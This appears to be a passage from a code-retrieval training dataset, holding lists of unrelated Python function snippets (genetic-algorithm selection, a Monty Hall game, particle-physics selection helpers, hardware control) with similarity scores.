generate_kdtree(self):\n if self.method==2:\n coordinates = self.unassigned_data[0:3,:]\n else:\n coordinates = self.unassigned_data[0:2,:]\n tree = cKDTree(coordinates.T)\n\n return tree", "def _select_single(self, disc):\n return QuadraticFieldClassNumbersTable._select_single(self, -disc)", "def __init__(self, r=1, p=3):\n self.p = p\n self.r = r", "def make_selection(self, num):\n other_doors = None\n if num is 1:\n other_doors = [str(2), str(3)]\n elif num is 2:\n other_doors = [str(1), str(3)]\n elif num is 3:\n other_doors = [str(1), str(2)]\n\n reveal = str(random.choice(other_doors))\n other_doors.remove(reveal)\n third_door = random.choice(other_doors)\n other_doors.remove(third_door)\n\n main_door = getattr(self, 'door' + str(num) + '_counter')\n door_second = getattr(self, 'door' + reveal + '_counter')\n door_third = getattr(self, 'door' + third_door + '_counter')\n main_door_reveal = getattr(self, 'door'+str(num)+'_reveal')\n\n if (main_door is 0 and door_second is 0\n and door_third is 0):\n self.ids['door'+reveal].source = \\\n getattr(self, 'door'+reveal+'_reveal')\n self.ids['button'+reveal].disabled = True\n inc = getattr(self, 'door' + str(num) + '_counter')\n setattr(self, 'door' + str(num) + '_counter', inc + 1)\n elif main_door is 1 and door_second is 0 and door_third is 0:\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()\n elif main_door is 0 and (door_second is 1 or door_third is 1):\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()", "def get_selection():\n\n selected = Gui.Selection.getSelectionEx()[0].SubObjects\n sel_len = len(selected)\n result = SelectionContainer()\n\n for _x in range(0, sel_len):\n\n shape_type = selected[_x].ShapeType\n\n if shape_type == 'Vertex':\n result.vertices.append(selected[_x])\n\n elif shape_type == 'Edge':\n\n if 'Line' in str(selected[_x].Curve):\n result.lines.append(selected[_x])\n else:\n result.curves.append(selected[_x])", "def __init__(self, disk_radius=None, even_sampling=False, no_data_value=None, ignore_labels=None):\n self.disk_radius = disk_radius\n self.ignore_labels = [] if ignore_labels is None else ignore_labels\n self.even_sampling = even_sampling\n self.no_data_value = no_data_value", "def selection(self):\n # create an empty priority queue for the new generation\n newGeneration = PriorityQueue()\n # pick top X of the population to survive\n for c in range(0, self.generation.qsize() / SELECTION_FRACTION):\n # get a chromosome\n chromosome = self.generation.get()\n # put the chromosomes in the new generation\n newGeneration.put(chromosome)\n # keep the new generation\n self.generation = newGeneration", "def initP0(self, size, radius):\n return h.circle(size, radius)[:, :, 0]", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def __init__(self, *args, **kwargs):\n _gdi_.PseudoDC_swiginit(self,_gdi_.new_PseudoDC(*args, **kwargs))", "def __init__(self,min_instances=30, drift_level=3.0):\n\n from math import sqrt\n self.min_instances = min_instances\n self.drift_level = float(drift_level)\n self.i = None\n self.pi = None\n self.si = None\n self.pi_min = None\n self.si_min = None\n self.sqrt=sqrt\n self.reset()", "def __init__(self):\n super().__init__()\n self.mu = 0.0\n self.type = 'Poisson'\n self.hasInfiniteBound = True\n self.distType = 'Discrete'\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def _create_example_door():\n return Door({\"warning\": False, \"closed\": True, \"locked\": False})", "def construct_random_initial(self):\n x = np.random.random((self._crv_size, self._bound))\n return x", "def __make_slide(self):\n # Create base rectangle for slide\n length = self.parameters['slide_base_length'] + self.parameters['bearing_slide_travel']\n width = self.parameters['slide_width']\n height = self.parameters['slide_height']\n slide = fso.Box(x=length,y=width,z=height)\n # Create the mounting holes\n radius = 0.5*self.parameters['slide_screw_size']\n base_hole = fso.Cylinder(r=radius, l=2*height)\n hole_list = []\n for i in (-1,1):\n for j in (-1,1):\n xpos = i*(0.5*length - self.parameters['slide_screw_inset'])\n ypos = j*(0.5*self.parameters['slide_screw_dW'])\n hole = base_hole.copy()\n hole.translate([xpos,ypos,0])\n hole_list.append(hole)\n # Remove hole material\n slide -= hole_list\n slide.set_color(self.slide_color,recursive=True)\n self.slide = slide", "def pool_selected( self, object ):\n\t\tud.debug( ud.ADMIN, ud.INFO, 'UVMM.DW.ps(node_uri=%s)' % self.node_uri)\n\t\tpool_name = object.options.get('pool-name')\n\t\tif not pool_name:\n\t\t\tpool_name = object.options['pool-name'] = 'default'\n\t\tdrive_type = object.options['drive-type']\n\t\ttry:\n\t\t\tif drive_type == 'cdrom':\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'cdrom')\n\t\t\telse:\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'disk' )\n\t\texcept uvmmd.UvmmError, e:\n\t\t\tvols = ()\n\t\tud.debug(ud.ADMIN, ud.INFO, 'UVMM.DW.ps: volumes=%s' % map(str, vols))\n\t\tchoices = []\n\t\tfor vol in vols:\n\t\t\tbasename = os.path.basename( vol.source )\n\t\t\tif '.' in basename:\n\t\t\t\tsuffix = basename[ basename.rfind( '.' ) + 1 : ]\n\t\t\t\tif suffix in ( 'xml', 'snapshot' ):\n\t\t\t\t\tcontinue\n\t\t\tchoices.append( basename )\n\t\tchoices.sort()\n\t\tself.image_syntax.update_choices( choices )\n\n\t\t# recreate pool button\n\t\tbtn = self._create_pool_select_button( object.options )\n\t\tself[DriveWizard.PAGE_OLD].options[0] = btn\n\t\tself[DriveWizard.PAGE_NEW].options[0] = btn\n\t\t# recreate driver-type button\n\t\titems = [self[DriveWizard.PAGE_NEW].options[2].id(), self[DriveWizard.PAGE_NEW].options[3].id()]\n\t\tbtn = self._create_type_select_button(object.options, items)\n\t\tself[DriveWizard.PAGE_NEW].options[1] = btn\n\n\t\tif drive_type == 'disk':\n\t\t\tself[DriveWizard.PAGE_OLD].hint = None\n\t\telif drive_type in ( 'cdrom', 'floppy' ):\n\t\t\tif self.image_syntax._choices:\n\t\t\t\tmsg = _( \"If the required image is not found it might be added by copying the file into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\telse:\n\t\t\t\tmsg = _( \"The list of available images is empty! To add an image the file needs to be copied into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\tself[DriveWizard.PAGE_OLD].hint = msg\n\t\t\tself[DriveWizard.PAGE_OLD].description = ''\n\t\telse:\n\t\t\traise ValueError('Invalid drive-type \"%s\"' % drive_type)\n\n\t\treturn self.type_selected(object)", "def selection(self):\n if not self._selection:\n return None\n \n year, month = self._date.year, self._date.month\n return self.datetime(year, month, int(self._selection[0]))", "def __init__(self, r1=4.5*0.0254, r2=4.5*0.0254,\n d1=25.0*0.0254, d2=25.0*0.0254,\n Ixx=185000.0*0.45359237*0.0254**2,\n Iyy=185000.0*0.45359237*0.0254**2,\n Izz=3500.0*0.45359237*0.0254**2,):\n self.r1 = r1 # m\n self.r2 = r2 # m\n self.d1 = d1 # m\n self.d2 = d2 # m\n self.Ixx = Ixx # kg-m^2\n self.Iyy = Iyy # kg-m^2\n self.Izz = Izz # kg-m^2", "def _generate_solution(self):\n \n operation_list = []\n available = {job.get_job_id(): [operation for operation in job.get_operations() if operation.get_sequence() == 0] for job in self.jssp_instance_data.jobs} # dictionary of first unprocessed operations of each job\n \n while 0 < len(available):\n rand_job_id = random.choice(list(available.keys()))\n rand_operation = random.choice(available[rand_job_id])\n rand_machine = np.random.choice(rand_operation.get_required_machines())\n\n available[rand_job_id].remove(rand_operation)\n \n if len(available[rand_job_id]) == 0:\n # if selected operation is last operation of the job \n if rand_operation.get_sequence() == self.jssp_instance_data.get_job(rand_job_id).get_max_sequence():\n del available[rand_job_id]\n else:\n available[rand_job_id] = [t for t in self.jssp_instance_data.get_job(rand_job_id).get_operations() if\n t.get_sequence() == rand_operation.get_sequence() + 1]\n\n\n operation_list.append([rand_job_id, rand_operation.get_operation_id(), rand_operation.get_sequence(), rand_machine]) # chromosome representation \n return Solution(self.jssp_instance_data, np.array(operation_list, dtype=np.intc))", "def __init__(self, dict = {}):\r\n if dict == {}:\r\n self.zero_val()\r\n else:\r\n self.piDD = dict\r\n self.top_node = utilities.max_length_in_list(self.return_keys())\r\n if self.piDD[self.top_node] == None:\r\n self.dim = 0\r\n else:\r\n self.dim = self.piDD[self.top_node][0][0]", "def __init__(self):\n\n self.P = list()\n self.label = 0", "def __init__(self, radius=0.5, extra={}):\n self.radius = radius\n self.sensors = [] # array of Attached\n self.id_sensors = None\n self.id_dynamics = None # XXX\n self.dynamics = None\n self.extra = extra\n\n self.primitives = set()\n\n # Needs to be initialized before calling certain functions\n self._state = None", "def _select(self):\n sel = []\n\n # choose randomly while favouring fit individuals\n lp = len(self.population) // 2\n for _ in range(lp):\n idx1 = idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n while idx1 == idx2:\n idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n\n p1, p2 = self.population[idx1], self.population[idx2]\n sel.append((p1, p2))\n\n return sel", "def eta23pi ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import DaVinci__N3BodyDecays\n ## \n pre_eta = self.make_selection (\n ## the unique tag \n 'PreEta3Pi' ,\n ## algorithm type to be used\n DaVinci__N3BodyDecays ,\n ## input selections \n [ self.pions () , self.pi0 () ] ,\n ## algorithm properties \n DecayDescriptor = \" eta -> pi+ pi- pi0\" ,\n ## \n Combination12Cut = \"\"\" ( AM < 700 * MeV ) &\n ( ACHI2DOCA(1,2) < 12 ) \n \"\"\" , \n ##\n CombinationCut = \"\"\"\n ( APT > %s ) & ( ADAMASS ( 'eta' ) < 100 * MeV )\n \"\"\" % ( 0.9 * self['ETA_PT'] ) ,\n ##\n MotherCut = \"\"\"\n ( PT > %s ) &\n ( chi2vx < 9 ) \n \"\"\" % self['ETA_PT']\n )\n ##\n from GaudiConfUtils.ConfigurableGenerators import Pi0Veto__Tagger2g\n ## \n return self.make_selection (\n 'Eta23pi' ,\n Pi0Veto__Tagger2g ,\n [ pre_eta ] ,\n MassWindow = 25 * MeV ,\n MassChi2 = -1 ,\n ExtraInfoIndex = 25016 ## unique ! \n )", "def __init__(self):\n raise NotImplementedError('cannot create independent arc')", "def __init__(self, d):\n\t\tself._coords = [0] * d", "def test_non_it(self):\n self.idx = [9, 11, 6, 10, 12, 2, 8, 1, 5, 0, 7, 4, 3]\n selector = PCovCUR(n_to_select=12, iterative=False)\n selector.fit(self.X, self.y)\n\n self.assertTrue(np.allclose(selector.selected_idx_, self.idx[:-1]))", "def __init__(self):\n\n # Assign a nullptr for the device-side pointers. These will be set if the GPU is utilized.\n self.ng = int(0)\n self.goals = ct.POINTER(ct.c_uint)()\n self.currentHorizon = int(0)\n self.V = ct.POINTER(ct.c_float)()\n self.VPrime = ct.POINTER(ct.c_float)()\n self.pi = ct.POINTER(ct.c_uint)()\n self.ne = int(0)\n self.expanded = ct.POINTER(ct.c_int)()\n self.d_goals = ct.POINTER(ct.c_uint)()\n self.d_S = ct.POINTER(ct.c_int)()\n self.d_T = ct.POINTER(ct.c_float)()\n self.d_R = ct.POINTER(ct.c_float)()\n self.d_V = ct.POINTER(ct.c_float)()\n self.d_VPrime = ct.POINTER(ct.c_float)()\n self.d_pi = ct.POINTER(ct.c_uint)()\n self.d_expanded = ct.POINTER(ct.c_int)()\n\n # Additional informative variables.\n self.Rmin = None\n self.Rmax = None", "def selected_choice(self):\r\n choice = zeros(self.num_agents)\r\n random_numbers = self.generate_random_numbers()\r\n\r\n self.prob_cumsum = self.cumprob().filled(-1)\r\n\r\n for i in range(self.num_choices):\r\n # Indicator for the zero cells in the choice array\r\n #indicator_zero_cells = ones(self.num_agents)\r\n indicator = array([True]*self.num_agents)\r\n\r\n zero_indices = choice == 0\r\n #indicator_zero_cells[~zero_indices] = ma.masked\r\n indicator[~zero_indices] = False\r\n\r\n # Indicator for the cells where the random number\r\n # is less than the probability\r\n #indicator_less_cells = ones(self.num_agents)\r\n #indicator_less_cells = array([True]*self.num_agents)\r\n less_indices = random_numbers < self.prob_cumsum[:,i]\r\n #indicator_less_cells[~less_indices] = ma.masked\r\n #indicator_less_cells\r\n indicator[~less_indices] = False\r\n\r\n\r\n #indicator_less_zero_cells = indicator_zero_cells + indicator_less_cells\r\n\r\n #indicator_less_zero_cells = indicator_less_zero_cells == 2\r\n\r\n choice[indicator] = i + 1\r\n\r\n choice.shape = (self.num_agents, 1)\r\n\r\n #alt_text = []\r\n #for i in choice:\r\n # alt_text.append(self.choices[int(i[0])-1])\r\n #alt_text = array(alt_text)\r\n #alt_text.shape = (self.num_agents, 1)\r\n\r\n #return alt_text\r\n #print choice\r\n return DataArray(choice, ['selected choice'])", "def __init__(self, analogue_selection='indep', clock_selection='in', cal_mode='no_cal', clk_speed=800):\n self.value = 0\n self.value |= (0b1 << 2) # disable chip version output bit\n self.value |= (0b1 << 3) # set demux to 1:2\n clk_bits = 0b00 if (clk_speed<125) else 0b01 if (clk_speed<250) else 0b10 if (clk_speed<500) else 0b11\n self.value |= (clk_bits << 12) # control wait bit calibration value is dependent on clk speed\n self.value |= (1 << 14) # set FDataReady to Fs/2. I don't know what this means\n self.set_analogue_selection(analogue_selection)\n self.set_clock_selection(clock_selection)\n self.set_cal_mode(cal_mode)", "def pi(self):\n return self(self._real_field().pi())", "def __init__(self):\n super().__init__()\n self.lambdaVar = 1.0\n self.low = 0.0\n self.type = 'Exponential'\n self.distType = 'Continuous'\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, params):\r\n _params = {'Similarity': 0.97,\r\n 'Application': 'cdhit',\r\n 'Algorithm': 'cdhit: \"longest-sequence-first list removal algorithm\"'}\r\n _params.update(params)\r\n OtuPicker.__init__(self, _params)", "def __init__(self, goal=0, kP=1, kI=1, kD=1, init_pt=0):\n self._pid_lock = threading.Lock()\n\n self.set_goal(goal)\n self.reset(init_pt)\n self.set_gains({\n PIDController.KP_KEY: kP,\n PIDController.KI_KEY: kI,\n PIDController.KD_KEY: kD\n })", "def select(self):\n\n return self.p[0], self.p[1]", "def __init__(\n self, voltage={0:(0, 0)}, rate=500, repetitions=1,\n board_name='cDAQ1Mod1', voltage_limits=None, num_channels=7):\n self.board_name = board_name #Check Measurement and Automation Explorer\n self._taskHandle = ctypes.c_void_p(0)\n self.num_channels = num_channels\n DAQmxErrChk(api.DAQmxCreateTask(\"\", ctypes.byref(self._taskHandle)))\n DAQmxErrChk(api.DAQmxCreateAOVoltageChan(\n self._taskHandle,\n self.board_name + \"/ao0:%i\"%(num_channels - 1),\n \"\",\n ctypes.c_double(-10.0), #Minimum voltage\n ctypes.c_double(10.0), #Maximum voltage\n 10348, #DAQmx_Val_Volts; don't question it!\n ctypes.c_void_p(0), #NULL\n ))\n self.num_points_written = ctypes.c_long(0)\n self._unwritten_voltages = False\n self._unplayed_voltages = False\n self.set_voltage_and_timing(voltage, rate, repetitions, voltage_limits)\n return None", "def get_selection(self, selection_name, format=None):", "def null(cls, d=2):\n return cls(*[0 for i in range(d)])", "def circle(self):\n return circle(self.N, self.o, self.r)", "def p_selection(p_init, it, n_iters):\n it = int(it / n_iters * 10000)\n\n if 10 < it <= 50:\n p = p_init / 2\n elif 50 < it <= 200:\n p = p_init / 4\n elif 200 < it <= 500:\n p = p_init / 8\n elif 500 < it <= 1000:\n p = p_init / 16\n elif 1000 < it <= 2000:\n p = p_init / 32\n elif 2000 < it <= 4000:\n p = p_init / 64\n elif 4000 < it <= 6000:\n p = p_init / 128\n elif 6000 < it <= 8000:\n p = p_init / 256\n elif 8000 < it <= 10000:\n p = p_init / 512\n else:\n p = p_init\n\n return p", "def __init__(self, pin1=24, pin2=28, pin3=25, pin4=33):\n self.GP = GPIOProcessor()\n self.pin1 = self.GP.getPin(pin1)\n self.pin2 = self.GP.getPin(pin2)\n self.pin3 = self.GP.getPin(pin3)\n self.pin4 = self.GP.getPin(pin4)\n self.pinl = [self.pin1, self.pin2, self.pin3, self.pin4]\n\n for k in range(4):\n self.pinl[k].out()\n\n self.speed = 100.0", "def select_arm(self):\n\n # Exploitation\n if random.uniform(0, 1) > self.epsilon:\n return np.argmax(self.values)\n\n # Exploration\n else:\n return random.randrange(len(self.values))", "def pick(self):\n\n pickerdict = {}\n current_value = 0\n\n if len(self.choices) == 0:\n return None\n\n if len(self.choices) == 1:\n return self.choices[0][0]\n\n for option in self.choices:\n pickerdict[current_value] = option[0]\n current_value += option[1]\n\n picker = random.randint(0, current_value)\n last_value = 0\n result = None\n sorted_keys = sorted(pickerdict.keys())\n\n found = False\n for key in sorted_keys:\n if key >= picker:\n result = pickerdict[last_value]\n found = True\n continue\n last_value = key\n\n if not found:\n result = pickerdict[sorted_keys[-1]]\n\n return result", "def select(self):\n pass", "def select(self):\n pass", "def __init__(self, choice):\r\n self.choice = choice", "def make_car():\n car = Car() \n car.drop_val = random.randint(0,1)\n\n if car.drop_val == 0:\n car.drop_x = random.randint(77, 400) * 2\n\n elif car.drop_val == 1:\n car.drop_y = random.randint(62, 300) *2\n\n return car", "def __init__(self, D, K):\n\t\tself.D = D \n\t\tself.K = K \n\t\tself.V = np.zeros((D+1,K))\n\t\treturn", "def dropdown(self):\n # defaults = DDConfig(0.6, 0.6, 0, 0)\n return DropDown(self.name, self.command, **self.config)", "def touching_choice(self,p):\n\n part = ['head', 'foot1', 'foot2', 'foot3', 'foot4', 'back', 'stomach', 'tail']\n if len(self.select[p]) == 0:\n return random.sample(part,2)\n elif len(self.select[p]) == 1:\n part.remove(self.select[p][0])\n c = random.sample(part,1)\n return [self.select[p][0], c[0]]\n else:\n return random.sample(self.select[p],2)", "def __init__(self, inplace=False):\n super(SELU, self).__init__()\n self.inplace = inplace", "def __init__(self, motor, OD_range=None, motor_range=None,\n motor_min=None, OD_min=None, motor_max=None, OD_max=None):\n self.motor = motor\n if OD_range is not None:\n self.OD_range = OD_range\n if motor_range is not None:\n self.motor_range = motor_range\n\n if motor_min is not None:\n self.motor_min = motor_min\n else:\n self.motor_min = motor_range[0]\n\n if motor_max is not None:\n self.motor_max = motor_max\n else:\n self.motor_max = motor_range[1]\n\n if OD_min is not None:\n self.OD_min = OD_min\n else:\n self.OD_min = OD_range[0]\n\n if OD_max is not None:\n self.OD_max = OD_max\n else:\n self.OD_max = OD_range[1]", "def select(self):\r\n pass", "def __init__(self, r: float, i: float = 0):\n self.r = r\n self.i = i", "def __init__(self, tpose, mpose, tselect=[], mselect=[]):\n self.target = tpose\n self.mobile = mpose\n self.target_residues = res_selector_to_size_list(tselect)\n self.mobile_residues = res_selector_to_size_list(mselect)\n self.set_target_sequence()\n self.set_mobile_sequence()\n self.atoms = ['N','C','CA']\n self.bb_rmsd = None", "def create_soft_cluster():\n # node, index_component, inf_val = general.get_soft_selection()\n soft_element_data = general.get_soft_selection()\n selection = [vtx_component for vtx_component, inf_val in soft_element_data]\n\n pm.select(selection, r=True)\n cluster = pm.cluster(relative=True)\n\n for vtx_component, inf_val in soft_element_data:\n pm.percent(cluster[0], vtx_component, v=inf_val)\n pm.select(cluster[1], r=True)\n\n return cluster", "def __init__(self):\n {}\n #generate a monoid Q\n self.monoid_Q = self.generateQ()[0]\n self.relationOfElements_Q = self.generateQ()[1]\n self.p_Position = self.generateQ()[2]\n self.qOfPosition = self.generateQ()[3]\n #print(self.qOfPosition)", "def get_slider():\n return dcc.RangeSlider(\n id='hours',\n value=[0, 23],\n min=0,\n max=23,\n marks={i: str(i) for i in range(0, 24, 3)}\n )", "def choose_pos(self):\n s = self\n\n availablepos = []\n for dblock in s.pjs.dblocks:\n is_available = True\n\n for powerup in s.pjs.powerups:\n if powerup.rects[0].overlap(dblock.rects[0]):\n is_available = False\n break\n\n if is_available:\n availablepos.append(dblock.rpos)\n\n pos = random.randint(0, len(availablepos) - 1)\n s.rpos = availablepos[pos]", "def zero_val(self):\r\n self.piDD = {\"[0]\": None}\r\n self.top_node = \"[0]\"\r\n self.dim = 0", "def __init__(self):\n super().__init__()\n self.low = 0.0\n self.high = 1.0\n self.alpha = 0.0\n self.beta = 0.0\n self.type = 'Beta'\n self.distType = 'Continuous'\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('Jacobi')\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'Jacobi'\n self.preferredPolynomials = 'Jacobi'", "def selectPointsUnderCursor(self):\n spw = self.spw\n sw = spw.windows['Sort']\n #if clear:\n # sw.uslist.clearSelection()\n # sw.nlist.clearSelection()\n x, y = self.cursorPosGL()\n sids = self.pick(x, y, pb=10, multiple=True)\n if sids is None:\n return\n #t0 = time.time()\n spw.SelectSpikes(sids, on=self.selecting)\n #print('SelectSpikes took %.3f sec' % (time.time()-t0))\n if self.selecting == True:\n sat = 0.2 # desaturate\n else: # self.selecting == False\n sat = 1 # resaturate\n self.color(sids, sat=sat)\n self.updateGL()", "def selection(self) -> Chromosome:\n # each chromosome has a fitness, and the lower the fitness, the higher the probability of election\n choices_list = list(range(len(self._population)))\n weights = [1 / chromosome.get_fitness() for chromosome in self._population]\n\n index = choices(choices_list, weights=weights)[0]\n\n return self._population[index]", "def create_pressure_vessel_geometry():\r\n\r\n # configure sigmoid function\r\n bounds_upper = [3, 6]\r\n h = 5\r\n w = 6\r\n\r\n sigmoid_function = lambda x: (1 / (1 + np.exp(-1 * h * x + w))) + 1\r\n\r\n sigmoid_function_reverse = lambda x: 1 / (1 + np.exp(h * x - w - 18)) + 1\r\n\r\n funcs_upper = [sigmoid_function, sigmoid_function_reverse]\r\n\r\n bounds_lower = None\r\n funcs_lower = 0\r\n\r\n x_max = 6\r\n x_min = 0\r\n resolution = 10000\r\n\r\n pressure_vessel = Geometry(x_max, x_min, resolution,\r\n bounds_upper, funcs_upper,\r\n bounds_lower, funcs_lower)\r\n\r\n return pressure_vessel", "def random(cls, d=2, borns=[-1, 1], **kwargs):\n components = [random.uniform(*borns) for i in range(d)]\n return cls(*components, **kwargs)", "def random(cls, d=2, borns=[-1, 1], **kwargs):\n components = [random.uniform(*borns) for i in range(d)]\n return cls(*components, **kwargs)" ]
[ "0.60390633", "0.5895539", "0.55829453", "0.5348063", "0.5305103", "0.5261155", "0.5167734", "0.51543236", "0.5077886", "0.5058524", "0.50535107", "0.50340015", "0.5013713", "0.49337313", "0.49296355", "0.48771095", "0.48653218", "0.48559302", "0.48356175", "0.48229763", "0.47938704", "0.47937343", "0.47884813", "0.4786957", "0.47820017", "0.47796422", "0.4728191", "0.47270483", "0.4726566", "0.47224525", "0.47163728", "0.4692927", "0.4683308", "0.4682291", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.46214193", "0.46164653", "0.46056542", "0.46046007", "0.46033987", "0.4589671", "0.4589013", "0.45679867", "0.4566554", "0.4557653", "0.45532042", "0.45365626", "0.4530548", "0.45283732", "0.45273715", "0.45257515", "0.4514184", "0.45141345", "0.45109862", "0.44972917", "0.44914532", "0.44913852", "0.44850183", "0.4477581", "0.44768035", "0.44728625", "0.44718337", "0.44647622", "0.44641063", "0.44597855", "0.44592988", "0.4457611", "0.44562554", "0.44530872", "0.44520926", "0.44520926", "0.44454646", "0.44417307", "0.44354388", "0.44337845", "0.4429657", "0.44287014", "0.44256827", "0.44169018", "0.44125795", "0.44094974", "0.440373", "0.43920735", "0.4389144", "0.4388632", "0.43877658", "0.43853682", "0.43819612", "0.43802664", "0.4378483", "0.4376915", "0.4376915" ]
0.6516377
0
Create and return a D > K pi pi+ Selection object.
def makeDPartial( name , config , DecayDescriptor , inputSel ) : _Kcuts1 = "~ISMUON & (PT > %(DaugPtLoose)s* MeV) & (MIPCHI2DV(PRIMARY) > %(DaugIPChi2Loose)s)" % locals()['config'] _KcutsPIDK = " & (PIDK > %(HighPIDK)s)" % locals()['config'] _Kcuts2 = " & (ISLONG) & (P > %(DaugPLoose)s* MeV) & (TRCHI2DOF < %(DaugTrkChi2Loose)s)" % locals()['config'] _Kcuts = _Kcuts1 + _KcutsPIDK + _Kcuts2 _Picuts1 = "~ISMUON & (PT > %(DaugPtMin)s* MeV) & (MIPCHI2DV(PRIMARY) > %(DaugIPChi2)s)" % locals()['config'] _PicutsPIDK = " & (PIDK < %(LowPIDK)s)" % locals()['config'] _Picuts2 = " & (ISLONG) & (P > %(DaugP)s* MeV) & (TRCHI2DOF < %(DaugTrkChi2)s)" % locals()['config'] _Picuts = _Picuts1 + _PicutsPIDK + _Picuts2 _dauCuts = { 'K+': _Kcuts, 'pi+': _Picuts } #_Kcuts1 = "~ISMUON & (PT > 500* MeV) & (MIPCHI2DV(PRIMARY) > 4)" #_KcutsPIDK = " & (PIDK > 5)" #_Kcuts2 = " & (ISLONG) & (P > 5000* MeV) & (TRCHI2DOF < 5)" #_Kcuts = _Kcuts1 + _KcutsPIDK + _Kcuts2 #_Picuts1 = "~ISMUON & (PT > 500* MeV) & (MIPCHI2DV(PRIMARY) > 4)" #_PicutsPIDK = " & (PIDK < 0)" #_Picuts2 = " & (ISLONG) & (P > 5000* MeV) & (TRCHI2DOF < 5)" #_Picuts = _Picuts1 + _PicutsPIDK + _Picuts2 #_dauCuts = { 'K+': _Kcuts, 'pi+': _Picuts } _combCuts = "(APT > %(D0PtLoose)s* MeV)" \ "& (AP > %(D0P)s* MeV)" % locals()['config'] _motherCuts = "(VFASPF(VCHI2PDOF) < %(D0VtxChi2Ndof)s)" \ "& (BPVVDCHI2 > %(D0FDChi2)s)" % locals()['config'] _Dminus = CombineParticles( DecayDescriptor = DecayDescriptor , DaughtersCuts = _dauCuts , CombinationCut = _combCuts , MotherCut = _motherCuts ) return Selection( name+'Sel', Algorithm = _Dminus, RequiredSelections = inputSel )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_selection ( self ,\n tag , \n algotype ,\n inputs , \n *args ,\n **kwargs ) :\n sel_tag = '%s_Selection' % tag\n sel_name = 'Sel%sFor%s' % ( tag , self.name() )\n #\n ## check existing selection\n #\n sel = self._selection ( sel_tag )\n if sel : return sel \n\n #\n ## adjust a bit the arguments\n if not kwargs.has_key('Preambulo') :\n kwargs ['Preambulo' ] = self['Preambulo']\n\n if not kwargs.has_key( 'ParticleCombiners' ) :\n kwargs ['ParticleCombiners'] = { '' : 'LoKi::VertexFitter:PUBLIC' } \n \n # \n ## use \"simple-selection\"\n #\n from PhysSelPython.Wrappers import SimpleSelection\n sel = SimpleSelection (\n sel_name ,\n algotype ,\n inputs , \n *args ,\n **kwargs )\n # \n return self._add_selection( sel_tag , sel )", "def from_selection(cls):\n guid = compas_rhino.select_point()\n return cls.from_guid(guid)", "def makeDstar2D0Pi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def create(cls, selection):\n\t\t\n\t\treturn cls({ true_selector: selection, false_selector: Selection.invert(selection) })", "def get_selection():\n\n selected = Gui.Selection.getSelectionEx()[0].SubObjects\n sel_len = len(selected)\n result = SelectionContainer()\n\n for _x in range(0, sel_len):\n\n shape_type = selected[_x].ShapeType\n\n if shape_type == 'Vertex':\n result.vertices.append(selected[_x])\n\n elif shape_type == 'Edge':\n\n if 'Line' in str(selected[_x].Curve):\n result.lines.append(selected[_x])\n else:\n result.curves.append(selected[_x])", "def curve_through_selection(*args):\n sel = cmds.ls(sl=True, fl=True)\n if not sel or len(sel)==1:\n cmds.warning(\"You need to select multiple things to create curve through!\")\n return()\n\n pList = []\n crvType = cmds.radioButtonGrp(widgets[\"crvSelRBG\"], q=True, sl=True)\n\n for obj in sel:\n if cmds.objectType(obj) in [\"transform\"]:\n pos = cmds.xform(obj, q=True, ws=True, rp=True)\n pList.append(pos)\n elif obj in cmds.filterExpand(sm=[28, 30, 31, 32, 34, 46]):\n pos = cmds.pointPosition(obj)\n pList.append(pos)\n\n #add points if only 2 (cv, ep) or 3 (cv) are given, and create the curve\n if crvType == 1:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n vec1 = [pList[1][0]-pList[0][0], 